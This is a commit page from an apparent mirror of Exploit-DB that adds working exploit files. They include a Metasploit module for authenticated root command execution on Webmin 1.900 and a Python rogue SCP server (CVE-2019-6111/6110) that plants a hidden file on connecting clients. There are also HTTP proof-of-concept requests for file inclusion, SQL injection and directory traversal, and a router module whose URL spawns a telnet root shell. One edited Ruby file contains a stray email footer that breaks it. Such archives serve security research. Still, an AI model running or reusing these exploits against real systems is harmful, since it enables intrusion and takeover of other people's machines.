bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-01-19

Browse source 
18 changes to exploits/shellcodes

Watchr 1.1.0.0 - Denial of Service (PoC)
One Search 1.1.0.0 - Denial of Service (PoC)
Eco Search 1.0.2.0 - Denial of Service (PoC)
7 Tik 1.0.1.0 - Denial of Service (PoC)
VPN Browser+ 1.1.0.0 - Denial of Service (PoC)
FastTube 1.0.1.0 - Denial of Service (PoC)
Microsoft Edge Chakra - 'InlineArrayPush' Type Confusion
Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion
Microsoft Edge Chakra - 'InitClass' Type Confusion
Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free
Webmin 1.900 - Remote Command Execution (Metasploit)
SCP Client - Multiple Vulnerabilities (SSHtranger Things)
SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion
phpTransformer 2016.9 - SQL Injection
phpTransformer 2016.9 - Directory Traversal
Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings
Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload
This commit is contained in:
Offensive Security 2019-01-19 05:01:57 +00:00
parent fade9b8cd4
commit 40d3df51a4
19 changed files with 1138 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

289
exploits/cgi/remote/46201.rb Executable file
View file

@ -0,0 +1,289 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin 1.900 - Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in Webmin
1.900 and lower versions. Any user authorized to the "Java file manager"
and "Upload and Download" fields, to execute arbitrary commands with root privileges.
In addition, "Running Processes" field must be authorized to discover the directory to be uploaded.
A vulnerable file can be printed on the original files of the Webmin application.
The vulberable file we are uploading should be integrated with the application.
Therefore, a ".cgi" file with the vulnerability belong to webmin application should be used.
The module has been tested successfully with Webmin 1900 over Debian 4.9.18.
},
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Webmin <= 1.900', { }]],
'DisclosureDate' => 'Jan 17 2019',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password'])
], self.class)
end
##
# Target and input verification
##
def check
peer = "#{rhost}:#{rport}"
vprint_status("Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.get_cookies =~ /sid/
vprint_good "Login successful"
session = res.get_cookies.split("sid=")[1].split(";")[0]
else
vprint_error "Service found, but login failed"
return Exploit::CheckCode::Detected
end
vprint_status("Attempting to execute...")
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
##
# Exploiting phase
##
def exploit
peer = "#{rhost}:#{rport}"
print_status("Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
if res and res.code == 302 and res.get_cookies =~ /sid/
session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
if session and not session.empty?
print_good "Login successfully"
else
print_error "Authentication failed"
return
end
else
print_error "Authentication failed"
return
end
##
# Directory and SSL verification for referer
##
ps = "#{datastore['SSL']}"
if ps == "true"
ssl = "https://"
else
ssl = "http://"
end
print_status("Target URL => #{ssl}#{peer}")
res1 = send_request_raw(
{
'method' => "POST",
'uri' => "/proc/index_tree.cgi?",
'headers' =>
{
'Referer' => "#{ssl}#{peer}/sysinfo.cgi?xnavigation=1",
},
'cookie' => "redirect=1; testing=1; sid=#{session}"
})
if res1 and res1.code == 200 and res1.body =~ /Running Processes/
print_status "Searching for directory to upload..."
stpdir = res1.body.scan(/perl.+miniserv.pl/).map{ |s| s.split("perl ").last }.map{ |d| d.split("miniserv").first }.map{ |d| d.split("miniserv").first }
dir = stpdir[0] + "file"
print_good("Directory to upload => #{dir}")
else
print_error "No access to processes or no upload directory found."
return
end
##
# Loading phase of the vulnerable file
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data2 = "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"upload0\"; filename=\"show.cgi\"\r\n"
data2 << "Content-Type: application/octet-stream\r\n\r\n"
data2 << "#!/usr/local/bin/perl\n# show.cgi\n# Output some file for the browser\n\n"
data2 << "$trust_unknown_referers = 1;\nrequire './file-lib.pl';\n&ReadParse();\nuse POSIX;\n"
data2 << "$p = $ENV{'PATH_INFO'};\nif ($in{'type'}) {\n\t# Use the supplied content type\n\t"
data2 << "$type = $in{'type'};\n\t$download = 1;\n\t}\nelsif ($in{'format'} == 1) {\n\t"
data2 << "# Type comes from compression format\n\t$type = \"application/zip\";\n\t}\n"
data2 << "elsif ($in{'format'} == 2) {\n\t$type = \"application/x-gzip\";\n\t}\n"
data2 << "elsif ($in{'format'} == 3) {\n\t$type = \"application/x-tar\";\n\t}\nelse {\n\t"
data2 << "# Try to guess type from filename\n\t$type = &guess_mime_type($p, undef);\n\t"
data2 << "if (!$type) {\n\t\t# No idea .. use the 'file' command\n\t\t"
data2 << "$out = &backquote_command(\"file \".\n\t\t\t\t\t quotemeta(&resolve_links($p)), 1);\n\t\t"
data2 << "if ($out =~ /text|script/) {\n\t\t\t$type = \"text/plain\";\n\t\t\t}\n\t\telse {\n\t\t\t"
data2 << "$type = \"application/unknown\";\n\t\t\t}\n\t\t}\n\t}\n\n# Dump the file\n&switch_acl_uid();\n"
data2 << "$temp = &transname();\nif (!&can_access($p)) {\n\t# ACL rules prevent access to file\n\t"
data2 << "&error_exit(&text('view_eaccess', &html_escape($p)));\n\t}\n$p = &unmake_chroot($p);\n\n"
data2 << "if ($in{'format'}) {\n\t# An archive of a directory was requested .. create it\n\t"
data2 << "$archive || &error_exit($text{'view_earchive'});\n\tif ($in{'format'} == 1) {\n\t\t"
data2 << "$p =~ s/\\.zip$//;\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t$p =~ s/\\.tgz$//;\n\t\t}\n\t"
data2 << "elsif ($in{'format'} == 3) {\n\t\t$p =~ s/\\.tar$//;\n\t\t}\n\t-d $p || &error_exit($text{'view_edir'}.\" \".&html_escape($p));\n\t"
data2 << "if ($archive == 2 && $archmax > 0) {\n\t\t# Check if directory is too large to archive\n\t\tlocal $kb = &disk_usage_kb($p);\n\t\t"
data2 << "if ($kb*1024 > $archmax) {\n\t\t\t&error_exit(&text('view_earchmax', $archmax));\n\t\t\t}\n\t\t}\n\n\t"
data2 << "# Work out the base directory and filename\n\tif ($p =~ /^(.*\\/)([^\\/]+)$/) {\n\t\t$pdir = $1;\n\t\t"
data2 << "$pfile = $2;\n\t\t}\n\telse {\n\t\t$pdir = \"/\";\n\t\t$pfile = $p;\n\t\t}\n\n\t"
data2 << "# Work out the command to run\n\tif ($in{'format'} == 1) {\n\t\t"
data2 << "&has_command(\"zip\") || &error_exit(&text('view_ecmd', \"zip\"));\n\t\t"
data2 << "$cmd = \"zip -r $temp \".quotemeta($pfile);\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t"
data2 << "&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t"
data2 << "&has_command(\"gzip\") || &error_exit(&text('view_ecmd', \"gzip\"));\n\t\t"
data2 << "$cmd = \"tar cf - \".quotemeta($pfile).\" | gzip -c >$temp\";\n\t\t}\n\t"
data2 << "elsif ($in{'format'} == 3) {\n\t\t&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t"
data2 << "$cmd = \"tar cf $temp \".quotemeta($pfile);\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t"
data2 << "# Don't actually do anything if in test mode\n\t\t&ok_exit();\n\t\t}\n\n\t"
data2 << "# Run the command, and send back the resulting file\n\tlocal $qpdir = quotemeta($pdir);\n\t"
data2 << "local $out = `cd $qpdir ; ($cmd) 2>&1 </dev/null`;\n\tif ($?) {\n\t\tunlink($temp);\n\t\t"
data2 << "&error_exit(&text('view_ecomp', &html_escape($out)));\n\t\t}\n\tlocal @st = stat($temp);\n\t"
data2 << "print \"Content-length: $st[7]\\n\";\n\tprint \"Content-type: $type\\n\\n\";\n\t"
data2 << "open(FILE, $temp);\n\tunlink($temp);\n\twhile(read(FILE, $buf, 1024)) {\n\t\tprint $buf;\n\t\t}\n\t"
data2 << "close(FILE);\n\t}\nelse {\n\tif (!open(FILE, $p)) {\n\t\t# Unix permissions prevent access\n\t\t"
data2 << "&error_exit(&text('view_eopen', $p, $!));\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t"
data2 << "# Don't actually do anything if in test mode\n\t\tclose(FILE);\n\t\t"
data2 << "&ok_exit();\n\t\t}\n\n\t@st = stat($p);\n\tprint \"X-no-links: 1\\n\";\n\t"
data2 << "print \"Content-length: $st[7]\\n\";\n\tprint \"Content-Disposition: Attachment\\n\" if ($download);\n\t"
data2 << "print \"Content-type: $type\\n\\n\";\n\tif ($type =~ /^text\\/html/i && !$in{'edit'}) {\n\t\t"
data2 << "while(read(FILE, $buf, 1024)) {\n\t\t\t$data .= $buf;\n\t\t\t}\n\t\tprint &filter_javascript($data);\n\t\t"
data2 << "}\n\telse {\n\t\twhile(read(FILE, $buf, 1024)) {\n\t\t\tprint $buf;\n\t\t\t}\n\t\t}\n\tclose(FILE);\n\t}\n\n"
data2 << "sub error_exit\n{\nprint \"Content-type: text/plain\\n\";\n"
data2 << "print \"Content-length: \",length($_[0]),\"\\n\\n\";\nprint $_[0];\nexit;\n}\n\n"
data2 << "sub ok_exit\n{\nprint \"Content-type: text/plain\\n\\n\";\nprint \"\\n\";\nexit;\n}"
data2 << "\r\n\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n#{dir}\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"user\"\r\n\r\nroot\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"group_def\"\r\n\r\n1\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"group\"\r\n\r\n\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"zip\"\r\n\r\n0\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"email_def\"\r\n\r\n1\r\n"
data2 << "-----------------------------{boundary}\r\n"
data2 << "Content-Disposition: form-data; name=\"ok\"\r\n\r\nUpload\r\n"
data2 << "-----------------------------{boundary}--\r\n"
res2 = send_request_raw(
{
'method' => "POST",
'uri' => "/updown/upload.cgi?id=154739243511",
'data' => data2,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => "#{ssl}#{peer}/updown/?xnavigation=1",
},
'cookie' => "redirect=1; testing=1; sid=#{session}"
})
if res2 and res2.code == 200 and res2.body =~ /Saving file/
print_good "Vulnerable show.cgi file was successfully uploaded."
else
print_error "Upload failed."
return
end
##
# Command execution and shell retrieval
##
print_status("Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
print_good "Payload executed successfully"
else
print_error "Error executing the payload"
return
end
end
end

16
exploits/hardware/remote/46143.rb
View file

@ -11,11 +11,11 @@ class MetasploitModule < Msf::Exploit::Remote
#
def initialize(info = {})
super(update_info(info,
'Name' => 'Hootoo HT-05 remote shell exploit',
'Name' => 'Hotoo HT-05 remote shell exploit',
'Description' => %q{
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
This exploit was written by Andrei Manole. Version of the firmware 2.000.022. Tested on 2.000.082 -> it still works
},
'Author' => 'Andrei Manole',
'References' =>
@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def send_request(host,port) #funzione di invio
def send_request(host,port)
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
http = Net::HTTP.new(uri.host, uri.port)
@ -65,18 +65,16 @@ def send_request(host,port) #funzione di invio
def exploit #exploit
print_status("[+] Apertura backdoor in corso...")
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
if !send_request(datastore['RHOST'],datastore['RPORT']) then
raise("[-] Errore nel apertura della porta")
end
print_good("[+] Richiesta inviata con successo! :)")
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione
nsock = self.connect(false, {"RPORT" => datastore['RPORT']})
print_good("[+] Porta aperta con successo ! :)")
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
nsock.put(payload.encoded + " >/dev/null 2>&1")
handler(nsock)
return
end
end
Sent with [ProtonMail](https://protonmail.com) Secure Email.
end

160
exploits/multiple/remote/46193.py Executable file
View file

@ -0,0 +1,160 @@
# Exploit Title: SSHtranger Things
# Date: 2019-01-17
# Exploit Author: Mark E. Haase <mhaase@hyperiongray.com>
# Vendor Homepage: https://www.openssh.com/
# Software Link: [download link if available]
# Version: OpenSSH 7.6p1
# Tested on: Ubuntu 18.04.1 LTS
# CVE : CVE-2019-6111, CVE-2019-6110
'''
Title: SSHtranger Things
Author: Mark E. Haase <mhaase@hyperiongray.com>
Homepage: https://www.hyperiongray.com
Date: 2019-01-17
CVE: CVE-2019-6111, CVE-2019-6110
Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1
We have nicknamed this "SSHtranger Things" because the bug is so old it could be
exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`
package.
The server listens on port 2222. It accepts any username and password, and it
generates a new host key every time you run it.
$ python3 sshtranger_things.py
Download a file using a vulnerable client. The local path must be a dot:
$ scp -P 2222 foo@localhost:test.txt .
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
foo@localhost's password:
test.txt 100% 32 0.7KB/s 00:00
The file you requested (e.g. test.txt) will be saved in your current directory.
If your client is vulnerable, you will have an additional file "exploit.txt"
created in your current directory.
$ cat test.txt
This is the file you requested.
$ cat exploit.txt
SSHtranger Things
The interesting code is in ScpServer.send_file().
'''
import base64
import gzip
import logging
import paramiko
import paramiko.rsakey
import socket
import threading
logging.basicConfig(level=logging.INFO)
dummy = 'This is the file you requested.\n'
payload = gzip.decompress(base64.b64decode(
b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'
b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'
b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'
b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'
b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'
b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'
b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'
b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'
b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'
b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'
))
class ScpServer(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def check_auth_password(self, username, password):
logging.info('Authenticated with %s:%s', username, password)
return paramiko.AUTH_SUCCESSFUL
def check_channel_request(self, kind, chanid):
logging.info('Opened session channel %d', chanid)
if kind == "session":
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_channel_exec_request(self, channel, command):
command = command.decode('ascii')
logging.info('Approving exec request: %s', command)
parts = command.split(' ')
# Make sure that this is a request to get a file:
assert parts[0] == 'scp'
assert '-f' in parts
file = parts[-1]
# Send file from a new thread.
threading.Thread(target=self.send_file, args=(channel, file)).start()
return True
def send_file(self, channel, file):
'''
The meat of the exploit:
1. Send the requested file.
2. Send another file (exploit.txt) that was not requested.
3. Print ANSI escape sequences to stderr to hide the transfer of
exploit.txt.
'''
def wait_ok():
assert channel.recv(1024) == b'\x00'
def send_ok():
channel.sendall(b'\x00')
wait_ok()
logging.info('Sending requested file "%s" to channel %d', file,
channel.get_id())
command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(dummy)
send_ok()
wait_ok()
# This is CVE-2019-6111: whatever file the client requested, we send
# them 'exploit.txt' instead.
logging.info('Sending malicious file "exploit.txt" to channel %d',
channel.get_id())
command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii')
channel.sendall(command)
wait_ok()
channel.sendall(payload)
send_ok()
wait_ok()
# This is CVE-2019-6110: the client will display the text that we send
# to stderr, even if it contains ANSI escape sequences. We can send
# ANSI codes that clear the current line to hide the fact that a second
# file was transmitted..
logging.info('Covering our tracks by sending ANSI escape sequence')
channel.sendall_stderr("\x1b[1A".encode('ascii'))
channel.close()
def main():
logging.info('Creating a temporary RSA host key...')
host_key = paramiko.rsakey.RSAKey.generate(1024)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 2222))
sock.listen(0)
logging.info('Listening on port 2222...')
while True:
client, addr = sock.accept()
logging.info('Received connection from %s:%s', *addr)
transport = paramiko.Transport(client)
transport.add_server_key(host_key)
server = ScpServer()
transport.start_server(server=server)
if __name__ == '__main__':
main()

82
exploits/php/webapps/46190.txt Normal file
View file

@ -0,0 +1,82 @@
# Exploit Title: SeoToaster Ecommerce 3.0.0 - Local File Inclusion
# Dork: N/A
# Date: 2019-01-17
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.seotoaster.com/shopping-cart/
# Software Link: https://www.seotoaster.com/downloads/seotoaster.v3.0.0.zip
# Version: 3.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# /* `exploitdb`.`user` */
# $user = array(
# array('id' => '1','role_id' => 'superadmin','password' => '21232f297a57a5a743894a0e4a801fc3','email' =>....
# array('id' => '2','role_id' => 'sales person','password' => 'b2e790a52146d5ec2f635c6bc699da91','email' =>....
# array('id' => '3','role_id' => 'copywriter','password' => 'd2af88cb19d3db3375266b63bfe8c55c','email' =>....
# );
# Tested role_id : sales person,copywriter
# POC:
# 1)
# http://localhost/[PATH]/backend/backend_theme/editcss/
#
POST /[PATH]/backend/backend_theme/editcss/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: hideAdminPanel=0; currSectionOpen=0; PHPSESSID=0u6ftq75vn79fs3512mli59jo3; mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D; back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3Asettings
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
getcss=../index.php: undefined
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 17:11:17 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.0.32
X-Powered-By: PHP/7.0.32
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2109
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
# POC:
# 2)
# http://localhost/[PATH]/backend/backend_theme/editjs/
#
POST /[PATH]/backend/backend_theme/editjs/ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Cookie: hideAdminPanel=0; currSectionOpen=0; PHPSESSID=0u6ftq75vn79fs3512mli59jo3; mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D; back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3Asettings
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
getjs=../index.php: undefined
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 17:11:41 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.0.32
X-Powered-By: PHP/7.0.32
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2109
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/json

59
exploits/php/webapps/46191.txt Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: phpTransformer 2016.9 - SQL Injection
# Dork: N/A
# Date: 2019-01-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://phptransformer.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/phptransformer/Version%202016.9/release_2016.9.zip
# Version: 2016.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/Programs/news/GeneratePDF.php?Lang=English&idnews=[SQLL]
#
# /[PATH]/Programs/news/GeneratePDF.php
#41 if(isset($_GET['idnews'])) {
#42 $IdNews = InputFilter($_GET['idnews']);
#43 $Lang = InputFilter($_GET['Lang']);
#44 // get idLang
#45 SqlConnect();
#46 ExcuteQuery('SELECT `IdLang` FROM `languages` WHERE `LangName`="'.$Lang.'";');
#47 if ($TotalRecords>0) {
#48 require_once('../../languages/lang-'.$Lang.'.php');
#49 $IdLang= $Rows['IdLang'];
#50 //GET NEWS DATE
#51 ExcuteQuery('SELECT * FROM `news` WHERE `IdNews`="'.$IdNews.'";');
#52 if ($TotalRecords>0) {
#53 $Date = $Rows['Date'];
#54 }
#55 else {
#56 $Date = Date('Y-m-d');
#57 }//end if
/* `exploitdb`.`users` */
$users = array(
array('UserId' => '200700000-1'....'UserName' => 'admin'....'PassWord' => '21232f297a57a5a743894a0e4a801fc3'....)
);
GET /[PATH]/Programs/news/GeneratePDF.php?Lang=English&idnews=20190000000%27%20%41%4e%44%20%53%4c%45%45%50%28%35%29%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: TryLogin=0; PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 22:43:00 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

74
exploits/php/webapps/46192.txt Normal file
View file

@ -0,0 +1,74 @@
# Exploit Title: phpTransformer 2016.9 - Directory Traversal
# Dork: N/A
# Date: 2019-01-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://phptransformer.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/phptransformer/Version%202016.9/release_2016.9.zip
# Version: 2016.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../
#
GET /[PATH]/phpTransformer-2016.9-Directory-raversal.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 23:19:59 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1535
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<?php
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/ExploitDb/release_2016.9/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../";
$url = file_get_contents($url);
$l = json_decode($url, true);
if($l){
echo "*-----------------------------*<br />";
foreach($l['files'] as $u){
echo "[-] Name:" .$u['name']." / Size:" .$u['size']."<br />";
}
echo "*-----------------------------*";}
?>
*-----------------------------*
[-] Name:ErrorPage.php / Size:1911
[-] Name:FootContainer.php / Size:968
[-] Name:Global.php / Size:11020
[-] Name:LICENSE.md / Size:36552
[-] Name:MainContainer.php / Size:4365
[-] Name:MarqueeContainer.php / Size:2394
[-] Name:MenuContainer.php / Size:1782
[-] Name:NavCont.php / Size:387
[-] Name:ProgramsContainer.php / Size:5869
[-] Name:README.md / Size:286
[-] Name:SecondairyContainer.php / Size:5169
[-] Name:Themes.php / Size:6830
[-] Name:TopContainer.php / Size:1378
[-] Name:a.php / Size:119
[-] Name:admin(renamed).php / Size:23841
[-] Name:animated_favicon.gif / Size:21501
[-] Name:cache.php / Size:2385
[-] Name:config.php / Size:997
